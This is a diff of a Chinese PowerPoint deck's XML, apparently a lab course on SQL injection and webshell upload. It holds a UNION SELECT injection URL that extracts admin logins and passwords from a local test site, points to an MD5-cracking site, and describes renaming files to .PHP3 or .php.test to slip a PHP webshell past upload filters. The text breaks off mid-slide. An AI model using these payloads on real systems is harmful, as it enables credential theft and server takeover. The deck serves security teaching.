-              <a:t>开发模式编写应用程序，在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-            </a:br>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-            </a:br>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入是从正常的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>WWW</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>端口访问，而且表面看起来跟一般的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>页面访问没什么区别</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>攻击</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>者把</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>命令插入到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>命令。在某些表单中，用户输入的内容直接用来构造（或者影响）动态</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>命令，或作为存储过程的输入参数，这类表单特别容易受到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入式攻击。 </a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-            </a:br>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="699000971"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111314253"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="462083" y="1685580"/>
+            <a:ext cx="11017493" cy="4671152"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>利用查询语句得到管理员账号与密码</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>获取用于访问管理页面的用户名和密码：</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,concat(login,%27:%27,password),3,4%20FROM%20users</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
+              <a:t>注入和利用</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="图片 1"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2269360" y="4010139"/>
+            <a:ext cx="6973792" cy="1737913"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063949669"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="462083" y="1685580"/>
+            <a:ext cx="11017493" cy="4671152"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>利用网络查询或密码破解工具得到密码</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
+              <a:t>明文            </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>://pmd5.com/</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
+              <a:t>注入和利用</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="图片 4"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2025324" y="2251170"/>
+            <a:ext cx="6753225" cy="3705225"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2274917450"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="288011"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>绕过过滤上传</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
+              <a:t>WebShell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1156776" y="1762699"/>
+            <a:ext cx="10223647" cy="4560983"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>webshell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>就是以</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>asp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>、</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>、</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>jsp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>或者</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>cgi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>asp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>或</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>后门文件与网站服务器</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>WEB</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>目录下正常的网页文件混在一起，然后就可以使用浏览器来访问</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>asp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>或者</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>后门，得到一个命令执行环境，以达到控制网站服务器的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>目的</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>账号密码登陆网站，找到上传文件位置，上传一个</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>脚本 ，如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>文件被过滤了则可选</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>用：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>PHP3——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>绕</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>过简单的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>过滤器</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>php.test</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>绕</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>过简单的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>过滤器，但</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Apache</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>仍会将它视作</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>文件，因为配置中没有对于</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>.test</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>文件的处理器</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>。</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4243551781"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="288011"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>绕过过滤上传</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
+              <a:t>WebShell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1156776" y="1762699"/>
+            <a:ext cx="10223647" cy="4560983"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>打开上传的图片，通过查看该页面的源代码，得到图片的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>URL</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>访问</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
